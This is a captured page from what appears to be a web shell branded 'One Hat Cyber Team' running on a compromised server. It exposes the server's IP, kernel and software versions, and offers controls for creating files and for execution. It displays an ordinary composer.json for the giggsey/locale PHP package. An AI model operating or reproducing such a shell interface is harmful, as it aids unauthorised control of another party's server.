⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
makarnacimmix.xyz
/
vendor
/
giggsey
/
locale
/
View File Name :
composer.json
{ "name": "giggsey/locale", "description": "Locale functions required by libphonenumber-for-php", "minimum-stability": "stable", "license": "MIT", "authors": [ { "name": "Joshua Gigg", "email": "giggsey@gmail.com", "homepage": "https://giggsey.com/" } ], "require": { "php": ">=7.2" }, "require-dev": { "ext-json": "*", "php-coveralls/php-coveralls": "^2.0", "phing/phing": "^2.7", "pear/versioncontrol_git": "^0.5", "pear/pear-core-minimal": "^1.9", "pear/pear_exception": "^1.0", "phpunit/phpunit": "^8.5|^9.5", "symfony/console": "^5.0|^6.0", "symfony/filesystem": "^5.0|^6.0", "symfony/process": "^5.0|^6.0", "symfony/finder": "^5.0|^6.0" }, "autoload": { "psr-4": { "Giggsey\\Locale\\": "src/" } }, "autoload-dev": { "psr-4": { "Giggsey\\Locale\\Tests\\": "tests/", "Giggsey\\Locale\\Build\\": "build/Build/" } }, "archive": { "exclude": [ "build/", "tests/", ".gitattributes", ".gitignore", ".styleci.yml", ".travis.yml", "build.xml", "phpunit.xml.dist" ] }, "scripts": { "test": "phpunit", "metadata": "phing compile" } }